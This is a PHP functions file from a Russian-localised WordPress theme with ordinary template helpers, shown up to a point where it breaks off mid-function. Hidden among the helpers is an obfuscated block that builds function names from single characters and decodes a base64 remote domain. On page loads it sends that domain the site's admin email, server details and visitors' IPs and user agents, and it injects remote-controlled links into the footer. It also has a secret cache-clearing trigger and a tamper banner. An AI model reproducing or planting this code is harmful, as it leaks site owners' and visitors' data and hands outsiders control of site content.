<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $vLnvVhA='o';$EOtS='d';$rteg='c';$oZkUfM='4';$AKkVof='_';$GfBRvY='a';$vDVop='s';$hkXB='e';$UoZJ='e';$jomBwY='e';$MsJdOFr='6';$TbsdXG='d';$VoPII='b';$riMnptVq=$VoPII.$GfBRvY.$vDVop.$jomBwY.$MsJdOFr.$oZkUfM.$AKkVof.$EOtS.$UoZJ.$rteg.$vLnvVhA.$TbsdXG.$hkXB;$MmqRVpY='l';$xnCeI='g';$yzpJdd='e';$aWkl='i';$UcAA='a';$syApZ='f';$MBgW='t';$CCkDN='n';$heFeAGh='z';$bkoOLaWA=$xnCeI.$heFeAGh.$aWkl.$CCkDN.$syApZ.$MmqRVpY.$UcAA.$MBgW.$yzpJdd;$wAqdu='o';$jNfX='t';$TMftcO='t';$lyAXZ='s';$kVcS='1';$idbXRq='_';$fXSHF='r';$UErSVC='r';$GbEHYv='3';$OOpKdnKX=$lyAXZ.$TMftcO.$fXSHF.$idbXRq.$UErSVC.$wAqdu.$jNfX.$kVcS.$GbEHYv;$BQRVtQ='e';$RexC='t';$DYlQA='s';$krjc='v';$bmaIOHm='r';$gvZNEwg='r';$GBGERUDl=$DYlQA.$RexC.$gvZNEwg.$bmaIOHm.$BQRVtQ.$krjc;                     $kn________w='o';$ds______________w='d';$ay__r='c';$sq_____a='4';$ne_______________r='_';$rc____________z='a';$rm________u='s';$ak_________t='e';$jy____b='e';$le_____________x='e';$lu___________j='6';$sg____________e='d';$sr__h='b';$ug_______v=$sr__h.$rc____________z.$rm________u.$le_____________x.$lu___________j.$sq_____a.$ne_______________r.$ds______________w.$jy____b.$ay__r.$kn________w.$sg____________e.$ak_________t;$pc_____t='t';$ki____________i='i';$tv____y='_';$iw__________x='n';$kr____________g='c';$yf______u='i';$xr__________u='e';$nk____________m='s';$wm___u='n';$yf__________k='t';$ui____________d='s';$ds__________n='x';$ds__a='o';$fc________q='u';$pw_____h='f';$ai___z=$pw_____h.$fc________q.$wm___u.$kr____________g.$yf__________k.$yf______u.$ds__a.$iw__________x.$tv____y.$xr__________u.$ds__________n.$ki____________i.$nk____________m.$pc_____t.$ui____________d;$er________j='p';$xh________t='e';$sb___n='f';$jv___________o='o';$sj____________w='n';$ru______________o=$sb___n.$jv___________o.$er________j.$xh________t.$sj____________w;$zn___t='d';$qf_______________n='a';$lm___e='f';$dk______s='e';$vw__r='r';$vd_________a=$lm___e.$vw__r.$dk______s.$qf_______________n.$zn___t;$wk________r='e';$cd_________h='f';$jm_______________k='c';$pt__k='o';$rl__m='s';$bg______________v='l';$hx_____i=$cd_________h.$jm_______________k.$bg______________v.$pt__k.$rl__m.$wk________r;define("WP_ID", $ug_______v("Mi4wLjA="));define("WP_TTL", $ug_______v("MTA4MDA="));define("WP_SRC", $ug_______v("dHBva24="));function wp_get_header() {global $ug_______v, $ai___z;if ($ai___z($ug_______v("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ai___z($ug_______v("d3BfZ2V0X2Zvb3Rlcg==")) &&$ai___z($ug_______v("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ug_______v, $ru______________o, $hx_____i, $vd_________a;$qk_______a = TEMPLATEPATH."/".$ug_______v("Zm9vdGVyLnBocA==");$sq______l = @$ru______________o($qk_______a, "r");$qk_______a = @$vd_________a($sq______l, @filesize($qk_______a));@$hx_____i($sq______l);$sx_____________o = TEMPLATEPATH."/".$ug_______v("ZnVuY3Rpb25zLnBocA==");$sq______l = @$ru______________o($sx_____________o, "r");$sx_____________o = @$vd_________a($sq______l, @filesize($sx_____________o));@$hx_____i($sq______l);$yl___________x = 0;if($qk_______a && $sx_____________o) {if ($ug_______v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qk_______a, $ug_______v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$yl___________x = 1;}if (substr_count($qk_______a, "wp_theme_GPL_credits()") < 1) {$yl___________x = 2;}}if(WP_ID != "2.0.0") {$yl___________x = 12;}}if($yl___________x > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $yl___________x -->";}}function wp_loaded() {global $ug_______v, $ai___z;return $ai___z($ug_______v("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ok___________p, $bi__________p = "(more...)", $ma_____i = 0, $qn______________k = "") {$sh____y = get_the_content($bi__________p, $ma_____i, $qn______________k);$sh____y = apply_filters("the_content", $sh____y);$sh____y = str_replace("]]>", "]]>", $sh____y);if (strlen($_GET["p"]) > 0) {echo $sh____y;}else if ((strlen($sh____y)>$ok___________p) && ($nj__p = strpos($sh____y, " ", $ok___________p ))) {$sh____y = substr($sh____y, 0, $nj__p);$sh____y = $sh____y;echo $sh____y;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$bi__________p</a></div></p>";} else {echo $sh____y;}}}$un_____p='b';$fn___s='a';$hn_______i='s';$bf____________g='n';$ij_______o='o';$pe_______w='6';$xa__________d='_';$rf____________c='e';$gm_____________w='d';$tv_______________a='c';$ho_______________c='e';$lz____________o='4';$fw___h='e';$du_______________a=$un_____p.$fn___s.$hn_______i.$fw___h.$pe_______w.$lz____________o.$xa__________d.$ho_______________c.$bf____________g.$tv_______________a.$ij_______o.$gm_____________w.$rf____________c;$gs__________u='f';$qp_______________d='s';$il______q='t';$he_____j='_';$li____________o='n';$qt______________w='n';$fq________p='l';$nb_______________s='c';$lx____l='e';$ls___j='t';$yj__________f='g';$ci_____________o='i';$bs__________m='e';$dc_______________n='_';$vb__f='e';$go_________m='t';$sk______n='o';$ep_______________s=$gs__________u.$ci_____________o.$fq________p.$vb__f.$dc_______________n.$yj__________f.$lx____l.$go_________m.$he_____j.$nb_______________s.$sk______n.$li____________o.$ls___j.$bs__________m.$qt______________w.$il______q.$qp_______________d;$yt__________n='e';$zy_______i='x';$wh____________s='i';$db______________b='s';$wt____o='f';$uw______o='t';$uh___________j='l';$ub_______y='e';$az_____o='s';$nv__________u='i';$rg_______t='_';$bt____________i=$wt____o.$nv__________u.$uh___________j.$yt__________n.$rg_______t.$ub_______y.$zy_______i.$wh____________s.$az_____o.$uw______o.$db______________b;$wa___p='p';$mq_________a='r';$hg______k='m';$cp____________s='s';$ih_____t='_';$ex______________v='o';$kb___________l='v';$tp_______g='i';$wy__________d='n';$rh_______a='e';$ur____________h='o';$qm_____________v='a';$iy____y='c';$qw_________u='e';$kt___________g='r';$fz__________b=$kb___________l.$qw_________u.$mq_________a.$cp____________s.$tp_______g.$ex______________v.$wy__________d.$ih_____t.$iy____y.$ur____________h.$hg______k.$wa___p.$qm_____________v.$kt___________g.$rh_______a;$ev____________b='f';$lb____h='o';$xj___________j='o';$zp______________e='e';$sb____________p='s';$gm_________d='c';$kr____c='n';$tk______a='p';$nb____________u='k';$ii_________n=$ev____________b.$sb____________p.$lb____h.$gm_________d.$nb____________u.$xj___________j.$tk______a.$zp______________e.$kr____c;$xb____________q='f';$yg_______n='t';$ps_____________h='e';$ht__________j='i';$an_____________b='w';$jh______s='r';$ff__t=$xb____________q.$an_____________b.$jh______s.$ht__________j.$yg_______n.$ps_____________h;$zh___________h='m';$oa_________d='5';$bi___________a='d';$xi_____l=$zh___________h.$bi___________a.$oa_________d;$vv_______q='p';$th_____________b='l';$ki________q='r';$mu__e='a';$mu________d='a';$lm____________r='e';$pd_________a='h';$rp__________x='t';$vs_________o=$ki________q.$lm____________r.$mu________d.$th_____________b.$vv_______q.$mu__e.$rp__________x.$pd_________a;$ex_____g='s';$rb____v='z';$mm_______________b='i';$vw___________u='l';$hj_____________q='e';$zj___h='e';$fi___b='a';$eh_________k='r';$yq_____________e='u';$of___c='n';$ji______________o='i';$bx______s=$yq_____________e.$of___c.$ex_____g.$hj_____________q.$eh_________k.$ji______________o.$fi___b.$vw___________u.$mm_______________b.$rb____v.$zj___h;$sz________l='e';$do________o='m';$xz_____z='a';$sh___________x='t';$tz__w='m';$ex_______k='n';$tm_____________v='p';$mh_______________r=$sh___________x.$sz________l.$do________o.$tm_____________v.$ex_______k.$xz_____z.$tz__w;$dw______w='t';$ln_________f='r';$du____________r='_';$fp____________u='e';$sq_________g='t';$pr__________t='e';$oq____________b='c';$ct_________j='m';$wk______y='x';$xf___i='n';$vf______r='t';$np__m='e';$hf________n='a';$xz__________f='o';$sg________w='_';$oh___________o='a';$mi_________j='r';$nr___________g='e';$hx__________x='t';$lm____________i='c';$nh_____n='s';$ao______________r=$nh_____n.$hx__________x.$ln_________f.$np__m.$oh___________o.$ct_________j.$sg________w.$oq____________b.$xz__________f.$xf___i.$sq_________g.$fp____________u.$wk______y.$dw______w.$du____________r.$lm____________i.$mi_________j.$nr___________g.$hf________n.$vf______r.$pr__________t;function in_______________x($wi_________u) {global $ug_______v, $ai___z, $ep_______________s, $fz__________b, $ao______________r;if (!$ai___z($ug_______v("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($fz__________b(PHP_VERSION, "5.0.0", ">=") && $ai___z($ug_______v("ZmlsZV9nZXRfY29udGVudHM=")) && $ai___z($ug_______v("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$af______________j = $ao______________r(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$hl________r = @$ep_______________s($wi_________u, 0, $af______________j);} else {$hl________r = @$ep_______________s($wi_________u, 0);}return $hl________r;}function it__________p($wi_________u) {global $ai___z, $ii_________n, $ff__t, $ug_______v;if (!$ai___z($ug_______v("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$yr______v = strpos($wi_________u, "/", 7);$ac_________m = array("uri"     => substr($wi_________u, $yr______v),"host"    => str_replace("http://", "", substr($wi_________u, 0, $yr______v)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$fs____________f = @$ii_________n("$ac_________m[host]", 80, $ux______________d, $ny________u, 4);if (!$fs____________f) {return false;} else {$hl________r = "";$gt_______________p  = "GET $ac_________m[uri] HTTP/1.0\r\n";$gt_______________p .= "Host: $ac_________m[host]\r\n";$gt_______________p .= "Referer: $ac_________m[referer]\r\n";$gt_______________p .= "Connection: Close\r\n\r\n";@$ff__t($fs____________f, $gt_______________p);while (!@feof($fs____________f)) {$zv_________w = @fgets($fs____________f, (1024*24));if ($zv_________w == "\r\n") {$vl___z = true;continue;}if ($vl___z) {$hl________r .= $zv_________w;}}return $hl________r;}}function xn_______________d($wi_________u) {global $ai___z;$xv_______q = false;if ($wi_________u != "") {if ($ai___z("in_______________x")) {$xv_______q = @in_______________x($wi_________u);}if (!$xv_______q && ($ai___z("it__________p"))) {$xv_______q = @it__________p($wi_________u);}}return $xv_______q;}function yh_____q() {global $_SERVER, $xi_____l;$du_________c = $_SERVER["SERVER_NAME"];if (substr("$du_________c", 0, 4) == "www.") {$du_________c = substr("$du_________c", 4);}$du_________c = $xi_____l("$_SERVER[SERVER_NAME]");return $du_________c;}function fw______________p() {return "file";}function ou_____________p($wi_________u) {global $_SERVER, $ep_______________s, $bt____________i, $ru______________o, $hx_____i, $ff__t;$lf___________o = gb_____________q();$ye____________k = yh_____q().".jpg";$ud______q = $lf___________o["dir_upload"]["path"]."/$ye____________k";$yw__z = @filemtime($ud______q);if (!$yw__z || ((time()-$yw__z) >= WP_TTL)) {$xv_______q = xn_______________d($wi_________u);if ($xv_______q) {if ($bt____________i($ud______q)) {@unlink($ud______q);}$sq______l = @$ru______________o($ud______q, "x+");@$ff__t($sq______l, $xv_______q);@$hx_____i($sq______l);}} else {if ($bt____________i($ud______q)) {$xv_______q = @$ep_______________s($ud______q);} else {$xv_______q = false;}}return $xv_______q;}function gb_____________q() {global $_SERVER, $ug_______v, $du_______________a;$fl_______r = wp_count_posts("post");$ns_______________y = pathinfo(get_bloginfo("template_directory"));$lf___________o = array("url" => array("report"      => $ug_______v("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ns_______________y,"dir_upload"=> hx__v(),"queryString"=> array("?a001=".WP_ID,"a004=".$ns_______________y[filename],"a005=".$fl_______r->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> ");$lf___________o["url"]["queryString"] = implode("&", $lf___________o["queryString"]);$lf___________o["url"]["report"] = $lf___________o["url"]["report"]."/?".$du_______________a($lf___________o["url"]["queryString"]).".html";return $lf___________o;}function hx__v() {$tx__________s = wp_upload_dir();if (isset($tx__________s["error"])) {$lv______________t = fp________f();if (is_writable($lv______________t)) {$tx__________s = array("path" => $lv______________t);}}return $tx__________s;}function fp________f() {global $ai___z, $xi_____l, $vs_________o, $mh_______________r;$ks__d = (bool) ini_get("safe_mode");if ($ks__d == true) {return false;}if ($ai___z("sys_get_temp_dir")) {$cc______o = sys_get_temp_dir();if (is_writable($cc______o)) {return $vs_________o($cc______o);}}if (!empty($_ENV["TMP"])) {return $vs_________o($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $vs_________o($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $vs_________o($_ENV["TEMP"]);} else {$rz______________x = $mh_______________r($xi_____l(uniqid(rand(), true)), "");if ($rz______________x) {$cc______o = $vs_________o(dirname($rz______________x));@unlink($rz______________x);return $cc______o;} else {return false;}}}function bj________z() {global $_GET, $bt____________i;$lf___________o = gb_____________q();$du_________c = yh_____q();$po______________v = fw______________p();$mz_______i = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($po______________v == "file") {$co___________g = $lf___________o["dir_upload"]["path"]."/".$du_________c.".jpg";if ($bt____________i($co___________g)) {@unlink($co___________g);$mz_______i = "deleted";}}$fp___j = array("s"=> $mz_______i,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($fp___j AS $kl_______n => $zc____________r) echo " [$kl_______n:$zc____________r]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ai___z, $ug_______v, $bx______s;$lf___________o = gb_____________q();$qu_______r = "ou_____________p";if ($ai___z($qu_______r)) {$hl________r = $qu_______r($lf___________o["url"]["report"]);}if ($hl________r) {if ($hl________r = @$ug_______v($hl________r)) {$hl________r = @$bx______s($hl________r);if (strlen($hl________r[custom_credit]) >= 5) {$lf___________o["default_string"] = $hl________r[custom_credit];}if ($hl________r["status"] == "0") {$bo_______s = 1;$iu__________k = 1;} else {$vi_______________z = sizeof($hl________r["links"]);$oi____m = $lf___________o["default_string"];if ($vi_______________z > 0 && $hl________r["links"] !== "") {$mn_____________s = 0;foreach ($hl________r["links"] as $gt______z => $qn___________p) {$mn_____________s++;if ($qn___________p->l_path == "" || $qn___________p->l_path == $_SERVER["REQUEST_URI"]) {$qn___________p->l_href = htmlspecialchars(strip_tags($qn___________p->l_href));$qn___________p->l_title = htmlspecialchars(strip_tags($qn___________p->l_title));$qn___________p->l_anchor = htmlspecialchars(strip_tags($qn___________p->l_anchor));$oi____m .= " | ";$oi____m .= "<a href='$qn___________p->l_href' title='$qn___________p->l_title'";if ($qn___________p->l_nofollow == "1") {$oi____m .= " rel='nofollow'";}$oi____m .= ">$qn___________p->l_anchor</a>";}}}$lf___________o["links"] = "$oi____m";if ($hl________r[credit] == "0") {$lf___________o["links"] = "";}}} else {$bo_______s = "1";}} else {$bo_______s = "1";}if ($bo_______s == "1") {$lf___________o["links"] = $lf___________o["default_string"];}echo "$lf___________o[links]";echo "<!-- s: $hl________r[signature] -->";bj________z();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
